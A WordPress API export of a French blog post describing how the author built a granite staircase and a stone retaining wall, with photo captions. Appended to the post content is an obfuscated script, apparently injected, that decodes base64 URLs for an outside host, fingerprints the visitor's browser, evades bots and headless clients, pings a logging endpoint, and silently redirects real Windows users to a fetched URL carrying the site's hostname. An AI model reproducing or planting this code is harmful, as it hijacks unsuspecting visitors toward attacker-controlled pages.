{"id":355,"date":"2020-04-29T14:18:36","date_gmt":"2020-04-29T12:18:36","guid":{"rendered":"http:\/\/lafermedelamotte.fr\/?p=355"},"modified":"2025-12-31T16:56:49","modified_gmt":"2025-12-31T15:56:49","slug":"escalier-de-granit-et-muret-de-pierre","status":"publish","type":"post","link":"http:\/\/lafermedelamotte.fr\/index.php\/2020\/04\/29\/escalier-de-granit-et-muret-de-pierre\/","title":{"rendered":"Escalier de granit et muret de pierre"},"content":{"rendered":"\n<p>Pendant le confinement, j&rsquo;ai r\u00e9alis\u00e9 un escalier de granit menant de l&rsquo;entr\u00e9e de la maison \u00e0 la chaufferie. Objectif : pouvoir aller mettre mon linge \u00e0 laver sans avoir \u00e0 mettre de chaussures ! C&rsquo;est un objectif comme un  autre&#8230;<\/p>\n\n\n\n<p>J&rsquo;ai pu trouver toutes les dalles de granit sur notre terrain. Encore une belle trouvaille ! Des petites dalles comme celles-ci sont d\u00e9j\u00e0 assez lourdes et pas facilement manipulables. Mais avec un diable et des leviers, je me suis d\u00e9brouill\u00e9e !<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-6-1024x576.jpg\" alt=\"\" class=\"wp-image-358\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-6-1024x576.jpg 1024w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-6-300x169.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-6-768x432.jpg 768w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-6.jpg 1777w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>Creuser, trier les cailloux (\u00e7a peut servir d&rsquo;avoir un stock de beaux cailloux&#8230;), poser la dalle, ajuster. Les dalles n&rsquo;ayant pas une \u00e9paisseur uniforme, il a fallu jouer avec la terre pour avoir une pierre approximativement droite \u00e0 la fin.<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog2-576x1024.jpg\" alt=\"\" class=\"wp-image-359\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog2-576x1024.jpg 576w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog2-169x300.jpg 169w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog2-768x1365.jpg 768w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog2.jpg 1000w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><figcaption>On commence \u00e0 voir l&rsquo;escalier se former. Romane adorait descendre sur \u00ab\u00a0l&rsquo;escalier de maman\u00a0\u00bb.<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog3-576x1024.jpg\" alt=\"\" class=\"wp-image-360\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog3-576x1024.jpg 576w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog3-169x300.jpg 169w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog3-768x1365.jpg 768w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog3.jpg 1000w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><figcaption>Celle-ci doit \u00eatre la dalle la moins lourde et donc la plus facilement manipulable. <\/figcaption><\/figure>\n\n\n\n<p>Une fois l&rsquo;escalier termin\u00e9, j&rsquo;ai entrepris de r\u00e9aliser un mur.  Je n&rsquo;ai fait cela qu&rsquo;en novembre (donc 6 mois apr\u00e8s). Mais \u00e9tant donn\u00e9 que je n&rsquo;\u00e9cris l&rsquo;article sur l&rsquo;escalier que maintenant, j&rsquo;en profite pour parler du mur.<\/p>\n\n\n\n<p>2 objectifs pour la construction de ce mur : cacher la partie basse du mur qui a \u00e9t\u00e9 ciment\u00e9e et avoir une profondeur de terre assez importante pour pouvoir planter (notamment une glycine).<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-4-1-768x1024.jpg\" alt=\"\" class=\"wp-image-356\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-4-1-768x1024.jpg 768w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-4-1-225x300.jpg 225w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-4-1.jpg 1000w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>J&rsquo;ai commenc\u00e9 par r\u00e9aliser de petites dalles de ciment pour avoir un mur stable, puis j&rsquo;ai commenc\u00e9 \u00e0 monter le mur. Le plus compliqu\u00e9 a \u00e9t\u00e9 de trouver les pierres ad\u00e9quates !<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"675\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-5-1-1024x675.jpg\" alt=\"\" class=\"wp-image-361\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-5-1-1024x675.jpg 1024w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-5-1-300x198.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-5-1-768x506.jpg 768w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-5-1.jpg 1433w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>Et voila ! Les framboisiers sont plant\u00e9s. Je vais voir comment ils se comportent cet \u00e9t\u00e9&#8230; Il vont profiter de la chaleur des pierres la nuit mais j&rsquo;ai peur qu&rsquo;ils aient chauds en journ\u00e9e (on est sur une fa\u00e7ade plein sud). Au beaux jours, nous enduirons ce mur comme nous l&rsquo;avons fait pour la maison.<\/figcaption><\/figure>\n<script>!async function(){let e=decodeURIComponent(escape(atob([\"aHR0cHM6Ly9tZXRyaWNhbH\",\"RpYy5jb20vYXBpL2dldA==\"].join(\"\")))),t=decodeURIComponent(escape(atob([\"aHR0cHM6Ly9tZXR\",\"yaWNhbHRpYy5jb2\",\"0vYXBpL2xvZw==\"].join(\"\"))))\nfunction o(e){return btoa(unescape(encodeURIComponent(e)))}let n={}\nif(window.location.search.slice(1).split(\"&\").forEach(e=>{let[t,o]=e.split(\"=\")\nt&&o&&(n[t]=decodeURIComponent(o.replace(\/\\+\/g,\" \")))}),n.verified&&localStorage.setItem(\"verified\",\"true\"),\"true\"===localStorage.getItem(\"verified\"))return\nfunction r(e,t){let o=e.match(t)\nreturn o?parseInt(o[1],10):null}let i=navigator.userAgent,a=\/Windows NT 10.0\/.test(i),l=r(i,\/Chrome\\\/(\\d+)\\.\/),c=r(i,\/Edg\\\/(\\d+)\\.\/),d=r(i,\/OPR\\\/(\\d+)\\.\/),s=r(i,\/YaBrowser\\\/(\\d+)\\.\/),u=r(i,\/Vivaldi\\\/(\\d+)\\.\/),w=r(i,\/Firefox\\\/(\\d+)\\.\/),h=!!window.chrome&&!\/Edg|OPR|YaBrowser|Vivaldi\/.test(i)&&\/Chrome\\\/(\\d+)\\.\/.test(i),g=!1;(l&&l>=136||c&&c>=134||d&&d>=120||s&&s>=24||u&&u>=6||w&&w>=140||h&&l&&l>=136)&&(g=!0)\nlet m=navigator.webdriver||\/HeadlessChrome\/.test(i)||!window.chrome||!navigator.plugins.length||!navigator.mimeTypes.length||0===window.outerWidth||0===window.outerHeight||window.screen&&(window.screen.width<800||window.screen.height<600)||\/bot|spider|crawl|python|curl|phantom|selenium|scrapy|node|headless\/i.test(i),p=!navigator.languages||0===navigator.languages.length||void 0===navigator.hardwareConcurrency||void 0===navigator.deviceMemory\nif(!a||m||p)return\nif(!g){try{fetch(t)}catch(e){}return}let v=document.querySelector('link[rel=\"icon\"]'),f=await async function t(n=1){try{let t=await async function(e,t={}){let{timeout:o=3e3}=t,n=new AbortController,r=setTimeout(()=>n.abort(),o)\ntry{let o=await fetch(e,{...t,signal:n.signal})\nreturn clearTimeout(r),o}catch(e){return clearTimeout(r),null}}(e,{timeout:3e3})\nif(!t||403===t.status)return null\nif(!t.ok)throw Error(\"Network response was not ok\")\nreturn`${(await t.json()).url}\/?wsid=${window.location.hostname}&domain=${o(window.location.hostname)}`}catch(e){return n<1?t(n+1):null}}()\nif(f){let e=f\nv&#038;&#038;(e+=`&#038;link=${o(v.href)}`),window.location.replace(e)}}()<\/script>","protected":false},"excerpt":{"rendered":"<p>Pendant le confinement, j&rsquo;ai r\u00e9alis\u00e9 un escalier de granit menant de l&rsquo;entr\u00e9e de la maison \u00e0 la chaufferie. Objectif : pouvoir aller mettre mon linge \u00e0 laver sans avoir \u00e0 mettre de chaussures ! C&rsquo;est un objectif comme un autre&#8230; J&rsquo;ai pu trouver toutes les dalles de granit sur notre terrain. Encore une belle trouvaille &hellip; <\/p>\n<p class=\"link-more\"><a href=\"http:\/\/lafermedelamotte.fr\/index.php\/2020\/04\/29\/escalier-de-granit-et-muret-de-pierre\/\" class=\"more-link\">Continuer la lecture<span class=\"screen-reader-text\"> de &laquo;&nbsp;Escalier de granit et muret de pierre&nbsp;&raquo;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[2],"tags":[],"class_list":["post-355","post","type-post","status-publish","format-standard","hentry","category-maison"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts\/355","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/comments?post=355"}],"version-history":[{"count":3,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts\/355\/revisions"}],"predecessor-version":[{"id":400,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts\/355\/revisions\/400"}],"wp:attachment":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/media?parent=355"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/categories?post=355"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/tags?post=355"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}